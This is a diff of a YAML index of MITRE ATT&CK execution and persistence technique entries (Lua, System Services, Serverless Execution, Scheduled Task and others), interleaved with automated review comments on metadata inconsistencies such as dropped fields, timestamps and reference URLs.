+ Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (.lua
), or from Lua-embedded programs (through the struct lua_State
).(Citation: Lua main page)(Citation: Lua state)
+
+ Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Script: Script Execution'
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+ created: '2024-08-05T18:19:42.201Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/011
+ external_id: T1059.011
+ - source_name: Kaspersky Lua
+ description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+ APT. Retrieved August 5, 2024.
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+ - source_name: Lua main page
+ description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+ url: https://www.lua.org/start.html
+ - source_name: Lua state
+ description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+ url: https://pgl.yoyo.org/luai/i/lua_State
+ - source_name: Cyphort EvilBunny
+ description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+ Instrumented By Lua. Retrieved August 5, 2024.'
+ url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+ - source_name: PoetRat Lua
+ description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+ public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+ url: https://blog.talosintelligence.com/poetrat-update/
+ - source_name: Lua Proofpoint Sunseed
+ description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+ Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+ Malware to Target European Governments and Refugee Movement. Retrieved August
+ 5, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
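Review bot: `x_mitre_permissions_required` (Administrator, User, SYSTEM) is removed from T1559 with nothing replacing it, and the same happens to T1569 and T1204.001 further down; if this mirrors the upstream ATT&CK retirement of that field, state it in the PR description, since any consumer filtering on required permissions will silently lose those values. Separately, the new T1059.011 (Lua) entry ships with `x_mitre_detection: ''` and no `identifier:` key, while the adjacent T1559 entry ends with `identifier: T1559` before `atomic_tests: []`; confirm the generator intends that difference rather than having skipped the key for a freshly added technique.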
T1204.003:
technique:
x_mitre_platforms:
@@ -26110,7 +26489,7 @@ execution:
url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
Supply Chain and Infrastructure. Retrieved August 26, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-26T16:42:35.318Z'
name: 'User Execution: Malicious Image'
description: |-
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
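Review bot: the `modified` timestamp for T1204.003 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-08-26T16:42:35.318Z`, while every other technique in this diff moves forward to 2024. If the upstream object genuinely carries the older date this is fine, but it looks like the entry was regenerated from an older bundle and is worth a second look.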
@@ -26137,30 +26516,12 @@ execution:
- 'Instance: Instance Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1204.003
atomic_tests: []
T1203:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1203
- url: https://attack.mitre.org/techniques/T1203
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:34:23.908Z'
+ name: Exploitation for Client Execution
description: |-
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
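Review bot: T1204.003 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` here, but unlike T1559, T1203 and T1569 in this diff no `x_mitre_attack_spec_version: 3.2.0` is added back for it anywhere in the visible hunks. Unless the key already appears above this hunk's context, T1204.003 ends up as the one technique without a spec version at all.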
@@ -26177,9 +26538,10 @@ execution:
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation for Client Execution
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Also look for behavior on the endpoint system that
might indicate successful compromise, such as abnormal behavior of the browser
@@ -26187,21 +26549,37 @@ execution:
evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution, evidence of Discovery, or other unusual network
traffic that may indicate additional tools transferred to the system.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
+ - 'File: File Modification'
- 'Application Log: Application Log Content'
+ - 'Network Traffic: Network Traffic Flow'
+ x_mitre_remote_support: false
x_mitre_system_requirements:
- Remote exploitation for execution requires a remotely accessible service reachable
over the network or other vector of access such as spearphishing or drive-by
compromise.
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+ created: '2018-04-18T17:59:24.739Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1203
+ external_id: T1203
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.006:
technique:
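Review bot: two data sources ('File: File Modification' and 'Network Traffic: Network Traffic Flow') are added to T1203 while `x_mitre_version` is re-emitted unchanged at '1.4'; other content changes in this diff (T1559, T1569, T1204.001, T1648) come with a version bump, so confirm this matches the upstream object and is not a merge of an older version line with newer data sources.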
@@ -26251,28 +26629,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.006
atomic_tests: []
T1569:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
- type: attack-pattern
- created: '2020-03-10T18:23:06.482Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569
- url: https://attack.mitre.org/techniques/T1569
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-20T19:55:40.527Z'
name: System Services
description: Adversaries may abuse system services or daemons to execute commands
or programs. Adversaries can execute malicious content by interacting with
@@ -26283,32 +26644,44 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for command line invocations of tools capable of
modifying services that doesn’t correspond to normal usage patterns and known
software, patch cycles, etc. Also monitor for changes to executables and other
files associated with services. Changes to Windows services may also be reflected
in the Registry.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- 'Service: Service Creation'
- 'File: File Modification'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- - root
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+ created: '2020-03-10T18:23:06.482Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569
+ external_id: T1569
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1059.003:
technique:
- modified: '2024-03-01T17:35:02.889Z'
+ modified: '2024-10-15T15:19:56.540Z'
name: 'Command and Scripting Interpreter: Windows Command Shell'
description: |-
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -26351,12 +26724,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.003
atomic_tests: []
T1651:
technique:
- modified: '2024-04-12T03:27:48.171Z'
+ modified: '2024-10-15T13:42:42.543Z'
name: Cloud Administration Command
description: |-
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26413,11 +26785,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:43:27.104Z'
name: 'Command and Scripting Interpreter: Visual Basic'
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26482,14 +26853,13 @@ execution:
url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.005
atomic_tests: []
T1648:
technique:
- modified: '2024-03-05T16:13:38.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Serverless Execution
description: "Adversaries may abuse serverless computing, integration, and automation
services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26510,14 +26880,19 @@ execution:
an adversary may create a Lambda function that automatically adds [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
and a corresponding CloudWatch events rule that invokes that function whenever
- a new user is created.(Citation: Backdooring an AWS account) Similarly, an
- adversary may create a Power Automate workflow in Office 365 environments
- that forwards all emails a user receives or creates anonymous sharing links
- whenever a user is granted access to a document in SharePoint.(Citation: Varonis
- Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+ a new user is created.(Citation: Backdooring an AWS account) This is also
+ possible in many cloud-based office application suites. For example, in Microsoft
+ 365 environments, an adversary may create a Power Automate workflow that forwards
+ all emails a user receives or creates anonymous sharing links whenever a user
+ is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+ Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+ environments, they may instead create an Apps Script that exfiltrates a user's
+ data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+ OWN-CERT Google App Script 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Praetorian
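Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted directly after `kill_chain_phases` for T1648, whereas for every other technique in this diff the key sits beside `object_marking_refs` at the end of the object; this entry appears to be emitted in alphabetical key order while the rest are not, which will keep producing churn on every regeneration. The new Google Workspace Apps Script sentence itself is fine; both of its citations are resolved in the references added later in this diff.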
@@ -26526,16 +26901,18 @@ execution:
- Varonis Threat Labs
- Alex Soler, AttackIQ
- Vectra AI
+ - OWN
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'Application Log: Application Log Content'
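Review bot: the platform value changes from `Office 365` to `Office Suite` (with the version bump to 1.1), so any per-platform index or filter keyed on the literal string 'Office 365' will no longer match T1648; check downstream consumers for the old name before merging.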
@@ -26561,6 +26938,14 @@ execution:
description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
url: https://www.varonis.com/blog/power-automate-data-exfiltration
+ - source_name: Cloud Hack Tricks GWS Apps Script
+ description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+ 2024.
+ url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+ - source_name: OWN-CERT Google App Script 2024
+ description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+ analysis. Retrieved October 2, 2024.
+ url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
- source_name: Cado Security Denonia
description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -26575,29 +26960,10 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
- type: attack-pattern
- created: '2020-03-11T14:43:31.706Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1204.001
- url: https://attack.mitre.org/techniques/T1204/001
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-10T16:40:03.786Z'
name: Malicious Link
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
@@ -26610,25 +26976,41 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: |-
Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+ created: '2020-03-11T14:43:31.706Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1204/001
+ external_id: T1204.001
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1569.002:
technique:
- modified: '2023-08-14T15:53:00.999Z'
+ modified: '2024-10-15T16:41:40.247Z'
name: 'System Services: Service Execution'
description: |-
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe
) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe
and [Net](https://attack.mitre.org/software/S0039).
@@ -26678,17 +27060,16 @@ execution:
url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1569.002
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
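Review bot: the sentence added to the T1053.002 description formats `at` and `Win32_ScheduledJob` with markdown backticks, while the rest of the same description carries its code spans as bare text with stray line breaks (`at.allow`, `at.deny`), which suggests `<code>` tags were stripped on import; if the importer strips HTML code tags it should treat both forms the same way so the rendered description is consistent.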
@@ -26751,7 +27132,7 @@ execution:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -26785,8 +27166,8 @@ execution:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -26795,6 +27176,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
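Review bot: the url on the new `Malicious Life by Cybereason` entry carries a stray page-fragment anchor, `https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe`; `#blog-subscribe` points at the newsletter widget rather than the article, so the reference should end at `wmi-lateral-movement-win32`. If this file is regenerated verbatim from the ATT&CK STIX bundle, that is an upstream fix rather than a local edit, but it is worth flagging so it does not get carried into every index. The description/Retrieved formatting otherwise matches the neighbouring entries.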
@@ -26807,29 +27192,29 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
persistence:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
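Review bot: the `- spec_version: '2.1'` removal at the top of this hunk, repeated for every technique object further down in this diff, drops a property that STIX 2.1 requires on every object and adds no replacement; if the generator now strips it on purpose, say so in the PR description, because any consumer that validates these objects as STIX 2.1 will reject them. On the T1053.005 description itself: the rewritten paragraph introduces `(Citation: Stack Overflow)` and `(Citation: Red Canary - Atomic Red Team)` tags, which get matching `source_name` entries in the @@ -26935 and @@ -26923 hunks respectively, and it also drops the sentence stating that `at.exe` cannot access tasks created with schtasks or the Control Panel, which is a content change rather than a reorder and deserves a mention in the PR.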
@@ -26876,7 +27261,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -26908,8 +27293,8 @@ persistence:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -26923,6 +27308,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -26935,16 +27324,19 @@ persistence:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
